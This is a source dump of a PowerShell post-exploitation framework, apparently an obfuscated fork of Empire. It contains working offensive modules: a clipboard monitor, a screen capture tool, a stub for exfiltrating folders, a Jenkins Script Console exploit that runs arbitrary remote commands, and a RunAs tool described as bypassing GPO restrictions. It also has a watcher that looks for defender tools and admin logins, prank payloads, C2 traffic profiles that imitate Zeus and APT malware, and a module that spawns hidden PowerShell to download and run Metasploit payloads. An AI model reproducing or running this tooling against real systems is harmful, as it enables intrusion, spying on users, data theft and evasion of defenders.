19 | Interval (in seconds) to check the clipboard for changes, defaults to 15 seconds.
20 | 
21 | .EXAMPLE
22 | 
23 | Invoke-ClipboardMonitor -CollectionLimit 120
24 | 
25 | .LINK
26 | 
27 | http://brianreiter.org/2010/09/03/copy-and-paste-with-clipboard-from-powershell/
28 | #>
29 | 
30 |     [CmdletBinding()] Param (
31 |         [Parameter(Position = 1)]
32 |         [UInt32]
33 |         $CollectionLimit,
34 | 
35 |         [Parameter(Position = 2)]
36 |         [UInt32]
37 |         $PollInterval = 15
38 |     )
39 | 
40 |     Add-Type -AssemblyName System.Windows.Forms
41 | 
42 |     # calculate the stop time if one is specified
43 |     if($CollectionLimit) {
44 |         $StopTime = (Get-Date).addminutes($CollectionLimit)
45 |     }
46 |     else {
47 |         $StopTime = (Get-Date).addyears(10)
48 |     }
49 | 
50 |     $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
51 |     "=== Get-ClipboardContents Starting at $TimeStamp ===`n"
52 | 
53 |     # used to check if the contents have changed
54 |     $PrevLength = 0
55 |     $PrevFirstChar = ""
56 | 
57 |     for(;;){
58 |         if ((Get-Date) -lt $StopTime){
59 | 
60 |             # stolen/adapted from http://brianreiter.org/2010/09/03/copy-and-paste-with-clipboard-from-powershell/
61 |             $tb = New-Object System.Windows.Forms.TextBox
62 |             $tb.Multiline = $true
63 |             $tb.Paste()
64 | 
65 |             # only output clipboard data if it's changed
66 |             if (($tb.Text.Length -ne 0) -and ($tb.Text.Length -ne $PrevLength)){
67 |                 # if the length isn't 0, the length has changed, and the first character
68 |                 # has changed, assume the clipboard has changed
69 |                 # YES I know there might be edge cases :)
70 |                 if($PrevFirstChar -ne ($tb.Text)[0]){
71 |                     $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
72 |                     "`n=== $TimeStamp ===`n"
73 |                     $tb.Text
74 |                     $PrevFirstChar = ($tb.Text)[0]
75 |                     $PrevLength = $tb.Text.Length 
76 |                 }
77 |             }
78 |         }
79 |         else{
80 |             $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
81 |             "`n=== Get-ClipboardContents Shutting down at $TimeStamp ===`n"
82 |             Break;
83 |         }
84 |         Start-Sleep -s $PollInterval
85 |     }
86 | }
87 | 


--------------------------------------------------------------------------------
/data/module_source/collection/Get-Screenshot.ps1:
--------------------------------------------------------------------------------
 1 | function Get-Screenshot 
 2 | {
 3 |     param
 4 |     (
 5 |         [Parameter(Mandatory = $False)]
 6 |         [string]
 7 |         $Ratio
 8 |     )
 9 |     Add-Type -Assembly System.Windows.Forms;
10 |     $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen;
11 |     $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height;
12 |     $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject);
13 |     $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size);
14 |     $DrawingGraphics.Dispose();
15 |     $ms = New-Object System.IO.MemoryStream;
16 |     if ($Ratio) {
17 |     	try {
18 |     		$iQual = [convert]::ToInt32($Ratio);
19 |     	} catch {
20 |     		$iQual=80;
21 |     	}
22 |     	if ($iQual -gt 100){
23 |     		$iQual=100;
24 |     	} elseif ($iQual -lt 1){
25 |     		$iQual=1;
26 |     	}
27 |     	$encoderParams = New-Object System.Drawing.Imaging.EncoderParameters;
28 | 			$encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual);
29 | 			$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
30 | 			$ScreenshotObject.save($ms, $jpegCodec, $encoderParams);
31 | 		} else {
32 |     	$ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png);
33 |     }
34 |     $ScreenshotObject.Dispose();
35 |     [convert]::ToBase64String($ms.ToArray());
36 | }
37 | Get-Screenshot


--------------------------------------------------------------------------------
/data/module_source/exfil/Invoke-PostExfil.ps1:
--------------------------------------------------------------------------------
 1 | 
 2 | Invoke-PostExfil {
 3 |   <#
 4 |   .SYNOPSIS
 5 | 
 6 |   Compresses a target folder, breaks it into chunks, and exfils
 7 |   the parts to a web server.
 8 | 
 9 |   .PARAMETER Folder
10 | 
11 |   Folder of files to exfil.
12 | 
13 |   .PARAMETER Server
14 | 
15 |   Server path to exfil to.
16 | 
17 |   #>
18 | 
19 |   function split($inFile,  $outPrefix, [Int32] $bufSize){
20 | 
21 |     $stream = [System.IO.File]::OpenRead($inFile)
22 |     $chunkNum = 1
23 |     $barr = New-Object byte[] $bufSize
24 | 
25 |     while( $bytesRead = $stream.Read($barr,0,$bufsize)){
26 |       $outFile = "$outPrefix$chunkNum"
27 |       $ostream = [System.IO.File]::OpenWrite($outFile)
28 |       $ostream.Write($barr,0,$bytesRead);
29 |       $ostream.close();
30 |       echo "wrote $outFile"
31 |       $chunkNum += 1
32 |     }
33 |   }
34 | }
35 | 
36 | 
37 | 
38 | 
39 | # split file into chunks,
40 | # upload to a specified exfil URI
41 | 


--------------------------------------------------------------------------------
/data/module_source/exploitation/Exploit-Jenkins.ps1:
--------------------------------------------------------------------------------
 1 |  function Exploit-Jenkins() {
 2 |     <#
 3 |     .SYNOPSIS
 4 |         PowerShell delivery for unauthenticated access to Jenkins Script Console
 5 |         
 6 |     .PARAMETER Rhost.
 7 |         Host to exploit
 8 | 
 9 |     .PARAMETER Port
10 |         Port to use.
11 | 
12 |     .PARAMETER Cmd
13 |         Command to run on remote Jenkins Script Console
14 | 
15 |     .EXAMPLE
16 |         Exploit-Jenkins -Rhost 127.0.0.1 -Port 8080 -Cmd whoami
17 |         Exploit-Jenkins -Rhost 127.0.0.1 -Port 8080 -Cmd "cmd /c netstat -an"
18 | 
19 |     .LINK
20 |         http://twitter.com/luxcupitor
21 | #>
22 | 
23 |     [CmdletBinding()]
24 |     param(
25 |         [Parameter(Mandatory=$True)]
26 |         [string] $Rhost,
27 |         [Parameter(Mandatory=$True)]
28 |         [string] $Cmd,
29 |         [Parameter(Mandatory=$False)]
30 |         [Int] $Port
31 |     )
32 |  Add-Type -Assembly System.Web
33 |  $url = "http://"+$($Rhost)+":"+$($Port)+"/script"
34 |  
35 |  $cookiejar = New-Object System.Net.CookieContainer
36 |  $Cmd = $Cmd -replace "\s","','"
37 |  $Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)
38 |  # Login
39 |  $webrequest = [System.Net.HTTPWebRequest]::Create($url);
40 |  $webrequest.CookieContainer = New-Object System.Net.CookieContainer;
41 |  $webrequest.Method = "GET"
42 |  $webrequest.Credentials = $credCache
43 |  if ($cookiejar -ne $null) { $webrequest.CookieContainer = $cookiejar }
44 |  $response = $webrequest.GetResponse()
45 |  $responseStream = $response.GetResponseStream()
46 |  $streamReader = New-Object System.IO.Streamreader($responseStream)
47 |  $output = $streamReader.ReadToEnd()
48 |  
49 | 
50 |  $postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"%27%29.redirectErrorStream%28true%29.start%28%29.text&Submit=Run"
51 |  $bytearray = [System.Text.Encoding]::UTF8.GetBytes($postdata)
52 |  
53 |  # Second request
54 |  $webrequest = [System.Net.HTTPWebRequest]::Create($url)
55 |  $webrequest.Credentials = $credCache
56 |  if ($cookiejar -ne $null) { $webrequest.CookieContainer=$cookiejar }
57 |  $webrequest.Method = "POST"
58 |  $webrequest.ContentType = "application/x-www-form-urlencoded"
59 |  $webrequest.ContentLength = $bytearray.Length
60 |  $requestStream = $webrequest.GetRequestStream()
61 |  
62 |  # Post data
63 |  $requestStream.Write($bytearray, 0, $bytearray.Length)
64 |  $requestStream.Close()
65 |  $response = $webrequest.GetResponse()
66 |  $responseStream  = $response.GetResponseStream()
67 |  
68 |  # Get Response
69 |  $streamReader = New-Object System.IO.Streamreader($responseStream)
70 |  $output = $streamReader.ReadToEnd()
71 |  $null = $output -match "Result</h2><pre>((?si).+?)</pre>"
72 |  #Write-Output $matches[1]
73 |  #return $output
74 |  return $matches[1]
75 |  }
76 | 


--------------------------------------------------------------------------------
/data/module_source/fun/Invoke-Thunderstruck.ps1:
--------------------------------------------------------------------------------
 1 | Function Invoke-Thunderstruck
 2 | {
 3 |     [CmdletBinding()]
 4 |     Param (
 5 |         [Parameter(Mandatory = $False, Position = 0)]
 6 |         [ValidateNotNullOrEmpty()]
 7 |         [String] $VideoURL = "https://www.youtube.com/watch?v=leJ_wj7mDa0"
 8 |     )
 9 |     
10 |     Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}}
11 |     Set-Speaker -Volume 50   
12 | 
13 |     #Create hidden IE Com Object
14 |     $IEComObject = New-Object -com "InternetExplorer.Application"
15 |     $IEComObject.visible = $False
16 |     $IEComObject.navigate($VideoURL)
17 | 
18 |     Start-Sleep -s 5
19 | 
20 |     $EndTime = (Get-Date).addseconds(90)
21 | 
22 |     # ghetto way to do this but it basically presses volume up to raise volume in a loop for 90 seconds
23 |     do {
24 |        $WscriptObject = New-Object -com wscript.shell
25 |        $WscriptObject.SendKeys([char]175)
26 |     }
27 |     until ((Get-Date) -gt $EndTime)
28 | }


--------------------------------------------------------------------------------
/data/module_source/fun/Invoke-VoiceTroll.ps1:
--------------------------------------------------------------------------------
 1 | Function Invoke-VoiceTroll
 2 | {
 3 |     [CmdletBinding()]
 4 |     Param (
 5 |         [Parameter(Mandatory = $True, Position = 0)]
 6 |         [ValidateNotNullOrEmpty()]
 7 |         [String] $VoiceText
 8 |     )
 9 |     Set-StrictMode -version 2
10 |   Add-Type -AssemblyName System.Speech
11 |   $synth = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer
12 |   $synth.Speak($VoiceText)
13 | }
14 | 


--------------------------------------------------------------------------------
/data/module_source/fun/Set-Wallpaper.ps1:
--------------------------------------------------------------------------------
 1 | # adapted from https://social.technet.microsoft.com/forums/scriptcenter/en-US/9af1769e-197f-4ef3-933f-83cb8f065afb/background-change
 2 | 
 3 | Function Set-WallPaper
 4 | {
 5 |     [CmdletBinding()] Param($WallpaperData)
 6 | 
 7 |     $SavePath = "$Env:UserProfile\\AppData\\Local\\wallpaper" + ".jpg"
 8 | 
 9 |     Set-Content -value $([System.Convert]::FromBase64String($WallpaperData)) -encoding byte -path $SavePath
10 | 
11 | add-type @"
12 | using System;
13 | using System.Runtime.InteropServices;
14 | using Microsoft.Win32;
15 | namespace Wallpaper
16 | {
17 |   public enum Style : int
18 |   {
19 |     Tiled, Centered, Stretched, Fit
20 |   }
21 | 
22 | 
23 |   public class Setter {
24 |    public const int SetDesktopWallpaper = 20;
25 |    public const int UpdateIniFile = 0x01;
26 |    public const int SendWinIniChange = 0x02;
27 | 
28 |    [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
29 |    private static extern int SystemParametersInfo (int uAction, int uParam, string lpvParam, int fuWinIni);
30 |    
31 |    public static void SetWallpaper ( string path, Wallpaper.Style style ) {
32 |      SystemParametersInfo( SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange );
33 |      
34 |      RegistryKey key = Registry.CurrentUser.OpenSubKey("Control Panel\\\\Desktop", true);
35 |      switch( style )
36 |      {
37 |        case Style.Stretched :
38 |          key.SetValue(@"WallpaperStyle", "2") ; 
39 |          key.SetValue(@"TileWallpaper", "0") ;
40 |          break;
41 |        case Style.Centered :
42 |          key.SetValue(@"WallpaperStyle", "1") ; 
43 |          key.SetValue(@"TileWallpaper", "0") ; 
44 |          break;
45 |        case Style.Tiled :
46 |          key.SetValue(@"WallpaperStyle", "1") ; 
47 |          key.SetValue(@"TileWallpaper", "1") ;
48 |          break;
49 |        case Style.Fit :
50 |          key.SetValue(@"WallpaperStyle", "6") ; 
51 |          key.SetValue(@"TileWallpaper", "0") ;
52 |          break;
53 |      }
54 |      key.Close();
55 |    }
56 |   }
57 | }
58 | "@ 
59 | 
60 |     $null = [Wallpaper.Setter]::SetWallpaper( (Convert-Path $SavePath), "Fit" )
61 | } 


--------------------------------------------------------------------------------
/data/module_source/management/Invoke-RunAs.ps1:
--------------------------------------------------------------------------------
 1 | function Invoke-RunAs {
 2 | <#
 3 | .DESCRIPTION
 4 | Runas knockoff. Will bypass GPO path restrictions.
 5 | 
 6 | .PARAMETER UserName
 7 | Provide a user
 8 | 
 9 | .PARAMETER Password
10 | Provide a password
11 | 
12 | .PARAMETER Domain
13 | Provide optional domain
14 | 
15 | .PARAMETER Cmd
16 | Command to execute.
17 | 
18 | .PARAMETER ShowWindow
19 | Show the window being created instead if hiding it (the default).
20 | 
21 | .Example
22 | Invoke-RunAs -username administrator -password "P@$$word!" -domain CORPA -Cmd notepad.exe
23 | #>
24 |     [CmdletBinding()]Param (
25 |     [Parameter(
26 |         ValueFromPipeline=$True)]
27 |         [String]$username,
28 |     [Parameter(
29 |         ValueFromPipeline=$True)]
30 |         [String]$password,
31 |     [Parameter(
32 |         ValueFromPipeline=$True)]
33 |         [String]$domain,
34 |     [Parameter(
35 |         ValueFromPipeline=$True)]
36 |         [String]$cmd,
37 |     [Parameter()]
38 |         [String]$Arguments,
39 |     [Parameter()]
40 |         [Switch]$ShowWindow
41 |     )
42 |     PROCESS {
43 |         try{
44 |             $startinfo = new-object System.Diagnostics.ProcessStartInfo
45 | 
46 |             $startinfo.FileName = $cmd
47 |             $startinfo.UseShellExecute = $false
48 | 
49 |             if(-not ($ShowWindow)) {
50 |                 $startinfo.CreateNoWindow = $True
51 |                 $startinfo.WindowStyle = "Hidden"
52 |             }
53 | 
54 |             if($Arguments) {
55 |                 $startinfo.Arguments = $Arguments
56 |             }
57 | 
58 |             if($UserName) {
59 |                 # if we're using alternate credentials
60 |                 $startinfo.UserName = $username
61 |                 $sec_password = convertto-securestring $password -asplaintext -force
62 |                 $startinfo.Password = $sec_password
63 |                 $startinfo.Domain = $domain
64 |             }
65 |             
66 |             [System.Diagnostics.Process]::Start($startinfo) | out-string
67 |         }
68 |         catch {
69 |             "[!] Error in runas: $_"
70 |         }
71 | 
72 |     }
73 | }
74 | 


--------------------------------------------------------------------------------
/data/module_source/situational_awareness/host/Get-SystemDNSServer.ps1:
--------------------------------------------------------------------------------
 1 | 
 2 | function Get-SystemDNSServer
 3 | {
 4 |     <#
 5 |     .Synopsis
 6 |        Enumerates the DNS Servers used by a system
 7 |        Part of Posh-SecMod (https://github.com/darkoperator/Posh-SecMod/)
 8 |        Author: darkoperator
 9 | 
10 |     .DESCRIPTION
11 |        Enumerates the DNS Servers used by a system returning an IP Address .Net object for each.
12 |     .EXAMPLE
13 |        C:\> Get-SystemDNSServer
14 |         Address            : 16885952
15 |         AddressFamily      : InterNetwork
16 |         ScopeId            :
17 |         IsIPv6Multicast    : False
18 |         IsIPv6LinkLocal    : False
19 |         IsIPv6SiteLocal    : False
20 |         IsIPv6Teredo       : False
21 |         IsIPv4MappedToIPv6 : False
22 |         IPAddressToString  : 192.168.1.1
23 |     #>
24 |     $DNSServerAddresses = @()
25 |     $interfaces = [System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces()
26 |     foreach($interface in $interfaces)
27 |     {
28 |         if($interface.OperationalStatus -eq "Up")
29 |         {
30 |             $DNSConfig = $interface.GetIPProperties().DnsAddresses
31 |             if (!$DNSConfig.IsIPv6SiteLocal)
32 |             {
33 |                 $DNSServerAddresses += $DNSConfig
34 |             }
35 |         }
36 |     }
37 |     $DNSServerAddresses
38 | }


--------------------------------------------------------------------------------
/data/module_source/situational_awareness/host/Invoke-Paranoia.ps1:
--------------------------------------------------------------------------------
 1 | function Invoke-Paranoia {
 2 |     param(
 3 |         [String[]] $watchUsers,
 4 |         [String[]] $watchProcesses,
 5 |         [String[]] $watchGroups
 6 | 
 7 |     )
 8 | 
 9 |     $defaultprocesses = @("taskmgr.exe", "mmc.exe", "wireshark.exe", "tcpview.exe", "procdump.exe", "procexp.exe", "procmon.exe", "netstat.exe", "psloggedon.exe", "logonsessions.exe", "processhacker.exe", "autoruns.exe", "autorunsc.exe")
10 |     $watchProcesses = $watchProcesses + $defaultprocesses
11 |     $defaultgroups = @("Domain Admins")
12 |     $watchGroups = $watchGroups + $defaultgroups
13 |     $groups_members = @{}
14 | 
15 |     function get_groupmembers {
16 |         param([String[]] $groups)
17 | 
18 |         $root=([ADSI]"").distinguishedName
19 |         $enumd_groups = @{}
20 |         $groups | foreach {
21 |             $to_search = $_
22 |             $enumd_groups.Add($to_search, @())
23 |             $group = [ADSI]("LDAP://CN=" + $to_search + ", CN=Users,$root")
24 |             $group.member|foreach {
25 |                 $enumd_groups[$to_search] += $_.split(",")[0].split("=")[1]
26 |             }
27 |         }
28 |         return $enumd_groups
29 |     }
30 |     
31 |     function process_proc {
32 |         param($proc,$group_members)
33 |         $userdom = ($proc.getOwner().Domain + "\" + $proc.getOwner().User).tolower()
34 |         $watchUsers | foreach {
35 |             if ($userdom -eq $_.tolower()) {
36 |                 "USER_DETECTED: $userdom : "+ $proc.name + "`n"
37 |             }
38 |             if ($proc.getOwner().Domain.tolower() -eq  $env:COMPUTERNAME -and $proc.getOwner().User.tolower() -eq $_) {
39 |                 "USER_DETECTED_LOCAL: $userdom : "+ $proc.name + "`n"
40 |             }
41 |         }
42 |         foreach ($group in $group_members.keys) {
43 |             foreach ($user in $group_members[$group]) {
44 |                 if ($proc.getOwner().User.tolower() -eq $user.tolower() -and $proc.getOwner().Domain -ne $env:COMPUTERNAME) {
45 |                     "USER_DETECTED_GROUP: $userdom : $group :" + $proc.name + "`n"
46 |                 }
47 |             }
48 |         }
49 |         $watchProcesses | foreach {
50 |             if($proc.name.tolower() -eq $_.tolower()) {
51 |                 "PROCESS_DETECTED: $userdom : " + $proc.name + "`n"
52 |             }
53 |         }
54 |         Get-WmiObject Win32_LogicalDisk | Where-Object {($_.DriveType -eq 2) -and ($_.DeviceID -ne 'A:')} | %{
55 |             if( ($proc.path.split(":")[0]+":").tolower() -eq $_.DeviceID) {
56 |                 "USB_PROCESS_DETECTED: " + $proc.path  + "`n"
57 |             }
58 |         }
59 |     }
60 | 
61 |     $groups_members = get_groupmembers $watchGroups
62 | 
63 |     # Main loop
64 |     while($True) {
65 |         Sleep 3
66 |         Get-WmiObject win32_process | %{
67 |             process_proc -proc $_ -group_members $groups_members
68 |         }
69 |     }
70 | }
71 | 


--------------------------------------------------------------------------------
/data/module_source/situational_awareness/host/Start-MonitorTCPConnections.ps1:
--------------------------------------------------------------------------------
 1 | function Start-TCPMonitor {
 2 |     [cmdletbinding()]
 3 |     Param(          
 4 |         [Parameter(Mandatory=$true)]  
 5 |         [String]$TargetDomain,
 6 |         [Parameter(Mandatory=$false)]
 7 |         [Int]$CheckInterval=30
 8 |     )
 9 | 
10 |     Function Get-ActiveTCPConnections {                                          
11 |         try {            
12 |             $TCPProperties = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()            
13 |             $Connections = $TCPProperties.GetActiveTcpConnections() 
14 |             return $Connections                     
15 |                     
16 |         } catch {            
17 |             Write-Error "Failed to get active connections. $_"  
18 |             return @()           
19 |         }           
20 |     }
21 | 
22 |     While(1){
23 |         $TargetDomainResolution = [System.Net.Dns]::GetHostAddresses("$TargetDomain")
24 |         $TargetIPs = New-Object System.Collections.ArrayList
25 |         foreach($i in $TargetDomainResolution ) { 
26 |             $TargetIPs.Add($i.IPAddressToString.trim()) >$null 2>&1
27 |         }
28 |         $tcpConns = Get-ActiveTCPConnections
29 |         foreach($Connection in $tcpConns) {
30 |             foreach($IP in $TargetIPs) {
31 |                 if( $Connection.RemoteEndPoint.Address.IPAddressToString -eq $IP ) {
32 |                     "Host connected to $TargetDomain"
33 |                 }
34 |            }
35 |         }
36 | 
37 |         sleep($CheckInterval)
38 |      
39 |    }
40 | }
41 | 


--------------------------------------------------------------------------------
/data/module_source/trollsploit/Get-RickAstley.ps1:
--------------------------------------------------------------------------------
 1 | # from https://gist.githubusercontent.com/SadProcessor/3e413f9542b01ee90979/raw/463c518c90fca50a2cee594d1b619a0d3fb5bed5/Get-RickAstley.ps1
 2 | function Get-RickAstley {
 3 |     [console]::beep(440,150)#A
 4 |     [console]::beep(493,150)#B
 5 |     [console]::beep(587,150)#D
 6 |     [console]::beep(493,150)#B
 7 |     Start-Sleep -m 20
 8 |     [console]::beep(698,400)#F
 9 |     [console]::beep(698,400)#F
10 |     [console]::beep(659,500)#E
11 |     Start-Sleep -m 50
12 |     ##
13 |     [console]::beep(440,150)#A
14 |     [console]::beep(493,150)#B
15 |     [console]::beep(523,150)#C
16 |     [console]::beep(444,150)#B
17 |     Start-Sleep -m 20
18 |     [console]::beep(659,400)#E
19 |     [console]::beep(659,400)#E
20 |     [console]::beep(587,400)#D
21 |     [console]::beep(523,100)#C
22 |     [console]::beep(440,100)#A
23 |     Start-Sleep -m 50
24 |     ##
25 |     [console]::beep(440,150)#A
26 |     [console]::beep(493,150)#B
27 |     [console]::beep(587,150)#D
28 |     [console]::beep(493,150)#B
29 |     Start-Sleep -m 20
30 |     [console]::beep(587,400)#D
31 |     [console]::beep(659,400)#E
32 |     [console]::beep(523,400)#C
33 |     [console]::beep(493,150)#B
34 |     [console]::beep(440,150)#A
35 |     Start-Sleep -m 20
36 |     [console]::beep(440,150)#A
37 |     [console]::beep(659,250)#E
38 |     [console]::beep(587,250)#D
39 |     Start-Sleep -m 200
40 |     ##
41 |     [console]::beep(440,150)#A
42 |     [console]::beep(493,150)#B
43 |     [console]::beep(587,150)#D
44 |     [console]::beep(493,150)#B
45 |     Start-Sleep -m 20
46 |     [console]::beep(698,400)#F
47 |     [console]::beep(698,400)#F
48 |     [console]::beep(659,500)#E
49 |     Start-Sleep -m 50
50 |     ##
51 |     [console]::beep(440,150)#A
52 |     [console]::beep(493,150)#B
53 |     [console]::beep(523,150)#C
54 |     [console]::beep(440,150)#A
55 |     Start-Sleep -m 20
56 |     [console]::beep(880,600)#A
57 |     [console]::beep(523,400)#C
58 |     [console]::beep(587,400)#D
59 |     [console]::beep(659,100)#E
60 |     [console]::beep(587,100)#D
61 |     start-sleep -m 50
62 |     ##
63 |     [console]::beep(440,150)#A
64 |     [console]::beep(493,150)#B
65 |     [console]::beep(587,150)#D
66 |     [console]::beep(493,150)#B
67 |     Start-Sleep -m 20
68 |     [console]::beep(587,400)#D
69 |     [console]::beep(659,400)#E
70 |     [console]::beep(523,400)#C
71 |     [console]::beep(493,150)#B
72 |     [console]::beep(440,150)#A
73 |     Start-Sleep -m 50
74 |     [console]::beep(440,150)#A
75 |     [console]::beep(659,250)#E
76 |     [console]::beep(587,250)#D
77 | }


--------------------------------------------------------------------------------
/data/obfuscated_module_source/code_execution/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/collection/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/collection/vaults/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/credentials/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/exfil/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/exploitation/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/fun/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/lateral_movement/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/management/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/persistence/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/privesc/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/recon/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/situational_awareness/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/situational_awareness/host/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/situational_awareness/network/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/obfuscated_module_source/trollsploit/.gitignore:
--------------------------------------------------------------------------------
1 | *.ps1
2 | 


--------------------------------------------------------------------------------
/data/profiles/comfoo.txt:
--------------------------------------------------------------------------------
1 | # Basic comfoo profile
2 | #   http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/
3 | #   https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/comfoo.profile
4 | 
5 | "/CWoNaJLBo/VTNeWw11212/|Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)|Accept:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*|Accept-Language:en-en"


--------------------------------------------------------------------------------
/data/profiles/fiesta.txt:
--------------------------------------------------------------------------------
1 | # Fiesta Exploit Kit traffic profile
2 | #   http://malware-traffic-analysis.net/2014/04/05/index.html
3 | #   https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/fiesta.profile
4 | 
5 | "/rmvk30g/|Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"


--------------------------------------------------------------------------------
/data/profiles/pitty_tiger.txt:
--------------------------------------------------------------------------------
1 | # Basic Pitty Tiger RAT profile
2 | #   http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf
3 | #   https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/pitty_tiger.profile
4 | 
5 | "/FC001/JOHN|Microsoft Internet Explorer"


--------------------------------------------------------------------------------
/data/profiles/zeus.txt:
--------------------------------------------------------------------------------
1 | # Basic Zeus variant profile
2 | #   https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/
3 | #   https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile
4 | 
5 | "/metro91/admin/1/ppptp.jpg,/metro91/admin/1/secure.php|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)|Accept:*/*"


--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/lib/__init__.py


--------------------------------------------------------------------------------
/lib/common/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/lib/common/__init__.py


--------------------------------------------------------------------------------
/lib/modules/powershell/code_execution/invoke_metasploitpayload.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-MetasploitPayload',
 9 |             'Author': ['@jaredhaight'],
10 |             'Description': ('Spawns a new, hidden PowerShell window that downloads'
11 |                             'and executes a Metasploit payload. This relies on the' 
12 |                             'exploit/multi/scripts/web_delivery metasploit module.'),
13 |             'Background' : False,
14 |             'OutputExtension' : None,
15 |             'NeedsAdmin' : False,
16 |             'OpsecSafe' : True,
17 | 
18 |             'Language' : 'powershell',
19 | 
20 |             'MinLanguageVersion' : '2',
21 | 
22 |             'Comments': [
23 |                 'https://github.com/jaredhaight/Invoke-MetasploitPayload/'
24 |             ]
25 |         }
26 | 
27 |         self.options = {
28 |             'Agent' : {
29 |                 'Description'   :   'Agent to run Metasploit payload on.',
30 |                 'Required'      :   True,
31 |                 'Value'         :   ''
32 |             },
33 |             'URL' : {
34 |                 'Description'   :   'URL from the Metasploit web_delivery module',
35 |                 'Required'      :   True,
36 |                 'Value'         :   ''
37 |             }
38 |         }
39 |         self.mainMenu = mainMenu
40 | 
41 |         if params:
42 |             for param in params:
43 |                 option, value = param
44 |                 if option in self.options:
45 |                     self.options[option]['Value'] = value
46 | 
47 | 
48 |     def generate(self, obfuscate=False, obfuscationCommand=""):
49 |         
50 |         moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-MetasploitPayload.ps1"
51 |         if obfuscate:
52 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
53 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
54 |         try:
55 |             f = open(moduleSource, 'r')
56 |         except:
57 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
58 |             return ""
59 | 
60 |         moduleCode = f.read()
61 |         f.close()
62 | 
63 |         script = moduleCode
64 |         scriptEnd = "\nInvoke-MetasploitPayload"
65 | 
66 |         for option,values in self.options.iteritems():
67 |             if option.lower() != "agent":
68 |                 if values['Value'] and values['Value'] != '':
69 |                     if values['Value'].lower() == "true":
70 |                         # if we're just adding a switch
71 |                         scriptEnd += " -" + str(option)
72 |                     else:
